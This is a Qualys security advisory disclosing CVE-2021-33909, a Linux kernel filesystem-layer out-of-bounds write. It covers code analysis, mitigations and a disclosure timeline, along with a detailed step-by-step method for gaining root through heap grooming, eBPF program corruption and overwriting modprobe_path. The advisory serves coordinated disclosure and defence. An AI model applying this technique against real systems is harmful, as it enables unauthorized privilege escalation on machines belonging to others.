Qualys Security Advisory Sequoia: A deep root in Linux's filesystem layer (CVE-2021-33909) ======================================================================== Contents ======================================================================== Summary Analysis Exploitation overview Exploitation details Mitigations Acknowledgments Timeline ======================================================================== Summary ======================================================================== We discovered a size_t-to-int conversion vulnerability in the Linux kernel's filesystem layer: by creating, mounting, and deleting a deep directory structure whose total path length exceeds 1GB, an unprivileged local attacker can write the 10-byte string "//deleted" to an offset of exactly -2GB-10B below the beginning of a vmalloc()ated kernel buffer. We successfully exploited this uncontrolled out-of-bounds write, and obtained full root privileges on default installations of Ubuntu 20.04, Ubuntu 20.10, Ubuntu 21.04, Debian 11, and Fedora 34 Workstation; other Linux distributions are certainly vulnerable, and probably exploitable. Our exploit requires approximately 5GB of memory and 1M inodes; we will publish it in the near future. A basic proof of concept (a crasher) is attached to this advisory and is available at: https://www.qualys.com/research/security-advisories/ To the best of our knowledge, this vulnerability was introduced in July 2014 (Linux 3.16) by commit 058504ed ("fs/seq_file: fallback to vmalloc allocation"). ======================================================================== Analysis ======================================================================== The Linux kernel's seq_file interface produces virtual files that contain sequences of records (for example, many files in /proc are seq_files, and records are usually lines). Each record must fit into a seq_file buffer, which is therefore enlarged as needed, by doubling its size at line 242 (seq_buf_alloc() is a simple wrapper around kvmalloc()): ------------------------------------------------------------------------ 168 ssize_t seq_read_iter(struct kiocb *iocb, struct iov_iter *iter) 169 { 170 struct seq_file *m = iocb->ki_filp->private_data; ... 205 /* grab buffer if we didn't have one */ 206 if (!m->buf) { 207 m->buf = seq_buf_alloc(m->size = PAGE_SIZE); ... 210 } ... 220 // get a non-empty record in the buffer ... 223 while (1) { ... 227 err = m->op->show(m, p); ... 236 if (!seq_has_overflowed(m)) // got it 237 goto Fill; 238 // need a bigger buffer ... 240 kvfree(m->buf); ... 242 m->buf = seq_buf_alloc(m->size <<= 1); ... 246 } ------------------------------------------------------------------------ This size multiplication is not a vulnerability in itself, because m->size is a size_t (an unsigned 64-bit integer, on x86_64), and the system would run out of memory long before this multiplication overflows the integer m->size. Unfortunately, this size_t is also passed to functions whose size argument is an int (a signed 32-bit integer), not a size_t. For example, the show_mountinfo() function (which is called at line 227 to format the records in /proc/self/mountinfo) calls seq_dentry() (at line 150), which calls dentry_path() (at line 530), which calls prepend() (at line 387): ------------------------------------------------------------------------ 135 static int show_mountinfo(struct seq_file *m, struct vfsmount *mnt) 136 { ... 150 seq_dentry(m, mnt->mnt_root, " \t\n\\"); ------------------------------------------------------------------------ 523 int seq_dentry(struct seq_file *m, struct dentry *dentry, const char *esc) 524 { 525 char *buf; 526 size_t size = seq_get_buf(m, &buf); ... 529 if (size) { 530 char *p = dentry_path(dentry, buf, size); ------------------------------------------------------------------------ 380 char *dentry_path(struct dentry *dentry, char *buf, int buflen) 381 { 382 char *p = NULL; ... 385 if (d_unlinked(dentry)) { 386 p = buf + buflen; 387 if (prepend(&p, &buflen, "//deleted", 10) != 0) ------------------------------------------------------------------------ 11 static int prepend(char **buffer, int *buflen, const char *str, int namelen) 12 { 13 *buflen -= namelen; 14 if (*buflen < 0) 15 return -ENAMETOOLONG; 16 *buffer -= namelen; 17 memcpy(*buffer, str, namelen); ------------------------------------------------------------------------ As a result, if an unprivileged local attacker creates, mounts, and deletes a deep directory structure whose total path length exceeds 1GB, and if the attacker open()s and read()s /proc/self/mountinfo, then: - in seq_read_iter(), a 2GB buffer is vmalloc()ated (line 242), and show_mountinfo() is called (line 227); - in show_mountinfo(), seq_dentry() is called with the empty 2GB buffer (line 150); - in seq_dentry(), dentry_path() is called with a 2GB size (line 530); - in dentry_path(), the int buflen is therefore negative (INT_MIN, -2GB), p points to an offset of -2GB below the vmalloc()ated buffer (line 386), and prepend() is called (line 387); - in prepend(), *buflen is decreased by 10 bytes and becomes a large but positive int (line 13), *buffer is decreased by 10 bytes and points to an offset of -2GB-10B below the vmalloc()ated buffer (line 16), and the 10-byte string "//deleted" is written out of bounds (line 17). ======================================================================== Exploitation overview ======================================================================== 1/ We mkdir() a deep directory structure (roughly 1M nested directories) whose total path length exceeds 1GB, we bind-mount it in an unprivileged user namespace, and rmdir() it. 2/ We create a thread that vmalloc()ates a small eBPF program (via BPF_PROG_LOAD), and we block this thread (via userfaultfd or FUSE) after our eBPF program has been validated by the kernel eBPF verifier but before it is JIT-compiled by the kernel. 3/ We open() /proc/self/mountinfo in our unprivileged user namespace, and start read()ing the long path of our bind-mounted directory, thereby writing the string "//deleted" to an offset of exactly -2GB-10B below the beginning of a vmalloc()ated buffer. 4/ We arrange for this "//deleted" string to overwrite an instruction of our validated eBPF program (and therefore nullify the security checks of the kernel eBPF verifier), and transform this uncontrolled out-of-bounds write into an information disclosure, and into a limited but controlled out-of-bounds write. 5/ We transform this limited out-of-bounds write into an arbitrary read and write of kernel memory, by reusing Manfred Paul's beautiful btf and map_push_elem techniques from: https://www.thezdi.com/blog/2020/4/8/cve-2020-8835-linux-kernel-privilege-escalation-via-improper-ebpf-program-verification 6/ We use this arbitrary read to locate the modprobe_path[] buffer in kernel memory, and use the arbitrary write to replace the contents of this buffer ("/sbin/modprobe" by default) with a path to our own executable, thus obtaining full root privileges. ======================================================================== Exploitation details ======================================================================== a/ We create a directory whose total path length exceeds 1GB: in theory, we need to create over 1GB/256B=4M nested directories (NAME_MAX is 255); in practice, show_mountinfo() replaces each '\\' character in our long directory with the 4-byte string "\\134", and we therefore need to create only 1M nested directories. b/ We fill all large vmalloc holes: we bind-mount (MS_BIND) various parts of our long directory in several unprivileged user namespaces and vmalloc()ate large seq_file buffers by read()ing /proc/self/mountinfo. For example, we vmalloc()ate 768MB of large buffers in our exploit. c/ We vmalloc()ate two 1GB buffers and one 2GB buffer (by bind-mounting our long directory in three different user namespaces, and by read()ing /proc/self/mountinfo), and we check that "//deleted" is indeed written to an offset of -2GB-10B below the beginning of our 2GB buffer (i.e., 8182B above the beginning of our first 1GB buffer -- the "XXX"s are guard pages): "//deleted" | 4KB v 1GB 4KB 1GB 4KB 2GB -----|---|---+-------------|---|-----------------|---|-----------------| ... |XXX| seq_file buffer |XXX| seq_file buffer |XXX| seq_file buffer | -----|---|---+-------------|---|-----------------|---|-----------------| | | | | \----<----<----<----<----<----<----<----/ 8182B -2GB-10B d/ We fill all small vmalloc holes: we vmalloc()ate various small socket buffers by send()ing numerous NETLINK_USERSOCK messages. For example, we vmalloc()ate 256MB of small buffers in our exploit. e/ We create 1024 user-space threads; each thread starts loading an eBPF program into the kernel, but (via userfaultfd or FUSE) we block every thread in kernel space (at line 2101), before our eBPF programs are actually vmalloc()ated (at line 2162): ------------------------------------------------------------------------ 2076 static int bpf_prog_load(union bpf_attr *attr, union bpf_attr __user *uattr) 2077 { .... 2100 /* copy eBPF program license from user space */ 2101 if (strncpy_from_user(license, u64_to_user_ptr(attr->license), .... 2161 /* plain bpf_prog allocation */ 2162 prog = bpf_prog_alloc(bpf_prog_size(attr->insn_cnt), GFP_USER); ------------------------------------------------------------------------ f/ We vfree() our first 1GB seq_file buffer (where "//deleted" was written out of bounds), and we immediately unblock all 1024 threads; our eBPF programs are vmalloc()ated into the 1GB hole that we just vfree()d: 4KB 1GB 4KB 1GB 4KB 2GB -----|---|-----------------|---|-----------------|---|-----------------| ... |XXX| eBPF programs |XXX| seq_file buffer |XXX| seq_file buffer | -----|---|-----------------|---|-----------------|---|-----------------| g/ Next, (again via userfaultfd or FUSE) we block one of our threads (at line 12795) after its eBPF program has been validated by the kernel eBPF verifier but before it is JIT-compiled by the kernel: ------------------------------------------------------------------------ 12640 int bpf_check(struct bpf_prog **prog, union bpf_attr *attr, 12641 union bpf_attr __user *uattr) 12642 { ..... 12795 print_verification_stats(env); ------------------------------------------------------------------------ h/ Last, we overwrite an instruction of this eBPF program with an out-of-bounds "//deleted" string (again via our 2GB seq_file buffer), and therefore nullify the security checks of the kernel eBPF verifier: "//deleted" | 4KB v 1GB 4KB 1GB 4KB 2GB -----|---|---+-------------|---|-----------------|---|-----------------| ... |XXX| eBPF programs |XXX| seq_file buffer |XXX| seq_file buffer | -----|---|---+-------------|---|-----------------|---|-----------------| | | | | \----<----<----<----<----<----<----<----/ 8182B -2GB-10B First, we transform this uncontrolled eBPF-program corruption into an information disclosure. Our first, uncorrupted eBPF program is deemed safe by the kernel eBPF verifier ("storage" and "control" are two basic BPF_MAP_TYPE_ARRAYs, readable and writable from user space via BPF_MAP_LOOKUP_ELEM and BPF_MAP_UPDATE_ELEM): - BPF_LD_IMM64_RAW(BPF_REG_2, BPF_PSEUDO_MAP_VALUE, storage) loads the address of our storage map (which resides in kernel space and whose address is unknown to us) into the eBPF register BPF_REG_2; - BPF_MOV64_IMM(BPF_REG_2, 0) immediately replaces the contents of BPF_REG_2 (the address of our storage map) with the constant value 0; - BPF_LD_IMM64_RAW(BPF_REG_3, BPF_PSEUDO_MAP_VALUE, control) loads the address of our control map into BPF_REG_3; - BPF_STX_MEM(BPF_DW, BPF_REG_3, BPF_REG_2, 0) stores the contents of BPF_REG_2 (the constant value 0) into our control map. However, our eBPF-program corruption overwrites the instruction BPF_MOV64_IMM(BPF_REG_2, 0) with the 8-byte string "deleted", which translates into the instruction BPF_ALU32_IMM(BPF_LSH, BPF_REG_5, 0x74): a NOP ("no operation"), because our program does not use BPF_REG_5. As a result, we do not store the constant value 0 into our control map: instead, we store and disclose the address of our storage map. (This information disclosure allowed us to greatly reduce the number of hardcoded kernel offsets in our exploit: our Ubuntu 20.04 exploit worked out of the box on Ubuntu 20.10, Ubuntu 21.04, Debian 11, and Fedora 34.) Second, we transform our uncontrolled eBPF-program corruption into a limited but controlled out-of-bounds write. Our second, uncorrupted eBPF program is also deemed safe by the kernel eBPF verifier ("corrupt" is a 3*64KB BPF_MAP_TYPE_ARRAY): - BPF_LD_IMM64_RAW(BPF_REG_4, BPF_PSEUDO_MAP_VALUE, corrupt) loads the address of our corrupt map into BPF_REG_4; - BPF_ALU64_IMM(BPF_ADD, BPF_REG_4, 3*64KB/2) points BPF_REG_4 to the middle of our corrupt map; - BPF_ALU64_IMM(BPF_SUB, BPF_REG_4, 3*64KB/4) points BPF_REG_4 to the first quarter of our corrupt map; - BPF_LD_IMM64_RAW(BPF_REG_3, BPF_PSEUDO_MAP_VALUE, control) loads the address of our control map into BPF_REG_3; - BPF_LDX_MEM(BPF_H, BPF_REG_7, BPF_REG_3, 0) loads a variable 16-bit offset from our control map into BPF_REG_7; - BPF_ALU64_REG(BPF_ADD, BPF_REG_4, BPF_REG_7) adds BPF_REG_7 (our variable 16-bit offset) to BPF_REG_4, which therefore points safely within the bounds of our corrupt map (because BPF_REG_7 is in the [0,64KB] range). However, our eBPF-program corruption overwrites the instruction BPF_ALU64_IMM(BPF_ADD, BPF_REG_4, 3*64KB/2) with the string "deleted", which translates into BPF_ALU32_IMM(BPF_LSH, BPF_REG_5, 0x74) (a NOP). As a result, the following BPF_ALU64_IMM(BPF_SUB, BPF_REG_4, 3*64KB/4) points BPF_REG_4 out of bounds and allows us to read from and write to the struct bpf_map that precedes our corrupt map in kernel space. Finally, we transform this limited out-of-bounds read and write into an arbitrary read and write of kernel memory, by reusing Manfred Paul's btf and map_push_elem techniques: - With the arbitrary kernel read we locate the symbol "__request_module" and hence the function __request_module(), disassemble this function, and extract the address of modprobe_path[] from the instructions for "if (!modprobe_path[0])". - With the arbitrary kernel write we overwrite the contents of modprobe_path[] ("/sbin/modprobe" by default) with a path to our own executable, and call request_module() (by creating a netlink socket), which executes modprobe_path, and hence our own executable, as root. ======================================================================== Mitigations ======================================================================== Important note: the following mitigations prevent only our specific exploit from working (but other exploitation techniques may exist); to completely fix this vulnerability, the kernel must be patched. - Set /proc/sys/kernel/unprivileged_userns_clone to 0, to prevent an attacker from mounting a long directory in a user namespace. However, the attacker may mount a long directory via FUSE instead; we have not fully explored this possibility, because we accidentally stumbled upon CVE-2021-33910 in systemd: if an attacker FUSE-mounts a long directory (longer than 8MB), then systemd exhausts its stack, crashes, and therefore crashes the entire operating system (a kernel panic). - Set /proc/sys/kernel/unprivileged_bpf_disabled to 1, to prevent an attacker from loading an eBPF program into the kernel. However, the attacker may corrupt other vmalloc()ated objects instead (for example, thread stacks), but we have not investigated this possibility. ======================================================================== Acknowledgments ======================================================================== We thank the PaX Team for answering our many questions about the Linux kernel. We also thank Manfred Paul, Jann Horn, Brandon Azad, Simon Scannell, and Bruce Leidl for their exploits and write-ups: https://www.thezdi.com/blog/2020/4/8/cve-2020-8835-linux-kernel-privilege-escalation-via-improper-ebpf-program-verification https://googleprojectzero.blogspot.com/2016/06/exploiting-recursion-in-linux-kernel_20.html https://googleprojectzero.blogspot.com/2020/12/an-ios-hacker-tries-android.html https://scannell.io/posts/ebpf-fuzzing/ https://github.com/brl/grlh We thank Red Hat Product Security and the members of linux-distros@openwall and security@kernel for their work on this coordinated disclosure. We also thank Mitre's CVE Assignment Team. Finally, we thank Marco Ivaldi for his continued support. ======================================================================== Timeline ======================================================================== 2021-06-09: We sent our advisories for CVE-2021-33909 and CVE-2021-33910 to Red Hat Product Security (the two vulnerabilities are closely related and the systemd-security mailing list is hosted by Red Hat). 2021-07-06: We sent our advisories, and Red Hat sent the patches they wrote, to the linux-distros@openwall mailing list. 2021-07-13: We sent our advisory for CVE-2021-33909, and Red Hat sent the patch they wrote, to the security@kernel mailing list. 2021-07-20: Coordinated Release Date (12:00 PM UTC).